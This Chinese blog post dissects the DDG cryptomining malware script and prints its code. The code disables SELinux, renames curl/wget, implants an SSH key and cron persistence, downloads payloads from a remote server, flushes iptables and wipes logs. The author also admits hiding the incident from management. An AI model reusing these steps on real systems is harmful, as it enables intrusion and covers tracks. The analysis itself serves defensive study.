公司有幾臺(tái)機(jī)器，最近 CPU 一直在瘋轉(zhuǎn)，就像是吃了藥，一直在發(fā)熱。由于機(jī)器實(shí)在是太多，有這么幾臺(tái)安全性防護(hù)沒(méi)有到位，就一直躺在角落里瘋狂運(yùn)轉(zhuǎn)。

[[328527]]
圖片來(lái)自 Pexels

直到統(tǒng)一的監(jiān)控腳本接管了這幾臺(tái)機(jī)器，異常情況才得以浮出水面。最后發(fā)現(xiàn)了多個(gè)奇奇怪怪的進(jìn)程，發(fā)現(xiàn)是一個(gè)挖礦腳本。

下載下來(lái)學(xué)習(xí)了一下，發(fā)現(xiàn)腳本的編寫(xiě)者，有著較高的水平。雖然在別人機(jī)器進(jìn)行挖礦行為是不道德的，但掩蓋不了腳本編寫(xiě)者的風(fēng)騷操作。

挖礦，是計(jì)算機(jī)技術(shù)界最讓人迷惑的行為之一，但它賺錢(qián)。據(jù)悉，這段腳本名叫 DDG，已經(jīng)挖取了價(jià)值一千多萬(wàn)人民幣的虛擬幣貨幣。

本著學(xué)習(xí)的目的，我稍微分析了一下這個(gè)神奇的腳本，也算是吸盡它的精華，為我所用。

這事我都沒(méi)敢告訴老板，因?yàn)檎f(shuō)了他也不懂，反生事端。不過(guò)和大家交流一下還是可以的，因?yàn)槟銈兌　?/p>

01.Code 1

#!/bin/sh 

腳本的第一行，看起來(lái)是一行注釋，但其實(shí)并不是。它規(guī)定了接下來(lái)的腳本，將要采用哪一個(gè) SHELL 執(zhí)行。

像我們平常用的 bash、zsh 等，屬于 sh 的超集，這個(gè)腳本使用 sh 作為執(zhí)行的 shell，具有更好的可移植性。

02.Code 2

setenforce 0 2>dev/null 
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null 

setenforce 是 Linux 的 selinux 防火墻配置命令，執(zhí)行 setenforce 0 表示關(guān)閉 selinux 防火墻。2 代表的是標(biāo)準(zhǔn)錯(cuò)誤(stderr)的意思。

所以后面，使用重定向符，將命令的錯(cuò)誤輸出定向到 /dev/null 設(shè)備中。這個(gè)設(shè)備是一個(gè)虛擬設(shè)備，意思是什么都不干。非常適合靜悄悄的干壞事。

03.Code 3

sync && echo 3 >/proc/sys/vm/drop_caches 

腳本貼心的幫我們釋放了一些內(nèi)存資源，以便獲取更多的資源進(jìn)行挖礦。

眾所周知，Linux 系統(tǒng)會(huì)隨著長(zhǎng)時(shí)間的運(yùn)行，會(huì)產(chǎn)生很多緩存，清理方式就是寫(xiě)一個(gè)數(shù)字到 drop_caches 文件里，這個(gè)數(shù)字通常為 3。

sync 命令將所有未寫(xiě)的系統(tǒng)緩沖區(qū)寫(xiě)到磁盤(pán)中，執(zhí)行之后就可以放心的釋放緩存了。

04.Code 4

crondir='/var/spool/cron/'"$USER" 
cont=`cat ${crondir}` 
ssht=`cat /root/.ssh/authorized_keys` 
echo 1 > /etc/sysupdates 
rtdir="/etc/sysupdates" 
bbdir="/usr/bin/curl" 
bbdira="/usr/bin/cur" 
ccdir="/usr/bin/wget" 
ccdira="/usr/bin/wge" 
mv /usr/bin/wget /usr/bin/get 
mv /usr/bin/xget /usr/bin/get 
mv /usr/bin/get /usr/bin/wge 
mv /usr/bin/curl /usr/bin/url 
mv /usr/bin/xurl /usr/bin/url 
mv /usr/bin/url /usr/bin/cur 

沒(méi)錯(cuò)，上面這些語(yǔ)句就是完成了一些普通的操作。值得注意的是，它把我們的一些常用命令，使用 mv 命令給重名了。

這在執(zhí)行命令的時(shí)候，就會(huì)顯得分成功能的蛋疼。這腳本已經(jīng)更改了計(jì)算機(jī)的一些文件，屬于犯罪的范疇了。

腳本為了復(fù)用一些功能，抽象出了很多的函數(shù)。我們直接跳到 main 函數(shù)的執(zhí)行，然后看一下這個(gè)過(guò)程。

05.Code 5

首先是 kill_miner_proc 函數(shù)。代碼很長(zhǎng)，就不全部貼出來(lái)了。

kill_miner_proc() 
{ 
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 
  ... 
    pkill -f biosetjenkins 
    pkill -f Loopback 
    ... 
    crontab -r 
    rm -rf /var/spool/cron/* 

挖礦領(lǐng)域是一個(gè)相愛(ài)相殺的領(lǐng)域。這個(gè)方法首先使用 ps、grep、kill 一套組合，干掉了同行的挖礦腳本，然后停掉了同行的 cron 腳本，黑吃黑的感覺(jué)。

在這段腳本里，使用了 pkill 命令。這個(gè)命令會(huì)終止進(jìn)程，并按終端號(hào)踢出用戶，比較暴力。

06.Code 6

接下來(lái)執(zhí)行的是 kill_sus_proc 函數(shù)。

ps axf -o "pid"|while read procid 
do 
... 
done 

ps 加上 o 參數(shù)，可以指定要輸出的列，在這里只輸出的進(jìn)程的 pid，然后使用 read 函數(shù)，對(duì) procid 進(jìn)行遍歷操作。

07.Code 7

ls -l /proc/$procid/exe | grep /tmp 
if [ $? -ne 1 ] 
then 
... 
fi 

上面就是遍歷操作過(guò)程了，我們可以看到 if 語(yǔ)句的語(yǔ)法。其中 $? 指的是上一個(gè)命令的退出狀態(tài)。

0 表示沒(méi)有錯(cuò)誤，其他任何值表明有錯(cuò)誤。-ne 是不等于的意思，意思就是能夠匹配到 tmp 這個(gè)字符串。

08.Code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid 
do 
... 
done 

呵呵，上面又來(lái)了一次循環(huán)遍歷。不過(guò)這次針對(duì)的目標(biāo)，是 CPU 使用超過(guò) 40% 的進(jìn)程。這就有點(diǎn)狠了：影響我挖礦的進(jìn)程，都得死!相煎何太急。

09.Code 9

再接下來(lái)，腳本針對(duì)不同的用戶屬性，進(jìn)行了不同的操作。

首先是 root 用戶。通過(guò)判斷是否存在 $rtdir 文件，來(lái)確定是否是 root 權(quán)限。

chattr -i /etc/sysupdate* 
chattr -i /etc/config.json* 
chattr -i /etc/update.sh* 
chattr -i /root/.ssh/authorized_keys* 
chattr -i /etc/networkservice 

使用 chattr 命令，把一些重要的文件，搞成不能任意改動(dòng)的只讀屬性，也是夠損的。然后，操作 cron 程序，把腳本的更新服務(wù)加入到定時(shí)中。

就是下面這段腳本。

10.Code 10

if [ ! -f "/usr/bin/crontab" ] 
then 
    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} 
else 
    [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - 
fi 

注意 [[ $cont =~ "update.sh" ]] 這以小段代碼，怪異的很。[[ ]] 是 shell 中內(nèi)置的一個(gè)命令，支持字符串的模式匹配。

使用 =~ 的時(shí)候，甚至支持 shell 的正則表達(dá)式，強(qiáng)大的令人發(fā)指。它的輸出結(jié)果是一個(gè) bool 類型，所以能夠使用||進(jìn)行拼接。

而后面的單小括號(hào) ()，是的是一個(gè)命令組，括號(hào)中多個(gè)命令之間用分號(hào)隔開(kāi)，最后一個(gè)命令可以沒(méi)有分號(hào);和 `cmd` 的效果基本是一樣的。

11.Code 11

搞完了定時(shí)任務(wù)，就要配置 ssh 自動(dòng)登錄了，通過(guò)把公鑰追加到信任列表中就可以。

chmod 700 /root/.ssh/ 
echo >> /root/.ssh/authorized_keys 
chmod 600 root/.ssh/authorized_keys 
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/                      

12.Code 12

說(shuō)曹操曹操就到，下面的腳本就使用了 `` 進(jìn)行操作。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` 
if [ "$filesize_config" -ne "$config_size" ] 
then 
    pkill -f sysupdate 
    rm /etc/config.json 
    downloads $config_url /etc/config.json $config_url_backup 
else 
    echo "no need download" 
fi    

通過(guò)一系列騷操作，獲取到配置文件的大小，如果判斷文件大小不一致，那么就重新下載一個(gè)。這就用到了 downloads 函數(shù)。

shell 中的函數(shù)，看起來(lái)比較怪異，后面的參數(shù)傳遞，就像是腳本傳遞一樣，傳送給函數(shù)。

13.Code 13

downloads $config_url /etc/config.json $config_url_backup 

這句話，就傳遞了三個(gè)參數(shù)。當(dāng)然，文件要從遙遠(yuǎn)的服務(wù)器上下載。域名是 .de 結(jié)尾的，證明是個(gè)德國(guó)的域名，其他的我們一無(wú)所知。

downloads() 
{ 
    if [ -f "/usr/bin/curl" ] 
    then 
    echo $1,$2 
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` 
        if [ "$http_code" -eq "200" ] 
        then 
            curl --connect-timeout 10 --retry 100 $1 > $2 
        elif [ "$http_code" -eq "405" ] 
        then 
            curl --connect-timeout 10 --retry 100 $1 > $2 
        else 
            curl --connect-timeout 10 --retry 100 $3 > $2 
        fi 
    elif [ -f "/usr/bin/cur" ] 
    then 
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` 
        if [ "$http_code" -eq "200" ] 
        then 
            cur --connect-timeout 10 --retry 100 $1 > $2 
        elif [ "$http_code" -eq "405" ] 
        then 
            cur --connect-timeout 10 --retry 100 $1 > $2 
        else 
            cur --connect-timeout 10 --retry 100 $3 > $2 
fi 
    elif [ -f "/usr/bin/wget" ] 
    then 
        wget --timeout=10 --tries=100 -O $2 $1 
        if [ $? -ne 0 ] 
    then 
        wget --timeout=10 --tries=100 -O $2 $3 
        fi 
    elif [ -f "/usr/bin/wge" ] 
    then 
        wge --timeout=10 --tries=100 -O $2 $1 
        if [ $? -eq 0 ] 
        then 
            wge --timeout=10 --tries=100 -O $2 $3 
        fi 
    fi 
} 

我認(rèn)為，這段代碼作者寫(xiě)的又臭又長(zhǎng)，完全沒(méi)有體現(xiàn)出自己應(yīng)有的水平。應(yīng)該是趕工期，沒(méi)有想好代碼的復(fù)用，才會(huì)寫(xiě)的這么有失水準(zhǔn)。

我們上面說(shuō)到，腳本改了幾個(gè)命令的名字，其中就有 curl。這個(gè)命令是如此的強(qiáng)大，以至于腳本的作者都忍不住加了不少參數(shù)：

• -I：用來(lái)測(cè)試 http 頭信息。
• -m：設(shè)置最大傳輸時(shí)間。
• -o：指定保持的文件名。這里是 /dev/null，呃呃呃......
• -s：靜默模式，不輸出任何東西。
• --connect-timeout：連接超時(shí)時(shí)間。
• --retry：重試次數(shù)，好狠，100 次。

如果沒(méi)有 curl?那就使用替補(bǔ)的 wget，套路都是一樣的。

14.Code 14

接下來(lái)是一系列相似的操作，最后，對(duì) iptables 一批操作。

iptables -F 
iptables -X 
iptables -A OUTPUT -p tcp --dport 3333 -j DROP 
iptables -A OUTPUT -p tcp --dport 5555 -j DROP 
iptables -A OUTPUT -p tcp --dport 7777 -j DROP 
iptables -A OUTPUT -p tcp --dport 9999 -j DROP 
iptables -I INPUT -s 43.245.222.57 -j DROP 
service iptables reload 

15.Code 15

細(xì)心的腳本編寫(xiě)者，還使用命令清理了操作日志。

history -c 
echo > /var/spool/mail/root 
echo > /var/log/wtmp 
echo > /var/log/secure 
echo > /root/.bash_history 

不露死角，瀟灑走開(kāi)?？梢钥吹?，且不說(shuō)真正的挖礦程序，僅僅是這個(gè)小腳本，作者也下足了功夫。

腳本里命令繁多，使用方式多樣，縮緊格式優(yōu)雅，除了有一點(diǎn)啰嗦，沒(méi)有加密之外，是一個(gè)非常好的拿來(lái)學(xué)習(xí)的腳本。

瞧了瞧被控制的機(jī)器，我趕緊偷偷的重裝了機(jī)器。就當(dāng)它是一個(gè)夢(mèng)吧。老板問(wèn)起的時(shí)候，什么都沒(méi)有發(fā)生過(guò)。

作者：小姐姐味道

簡(jiǎn)介：聚焦基礎(chǔ)架構(gòu)和 Linux。十年架構(gòu)，日百億流量，與你探討高并發(fā)世界，給你不一樣的味道。個(gè)人微信 xjjdog0，歡迎添加好友，進(jìn)一步交流。

編輯：陶家龍

出處：轉(zhuǎn)載自微信公眾號(hào)小姐姐味道(ID：xjjdog)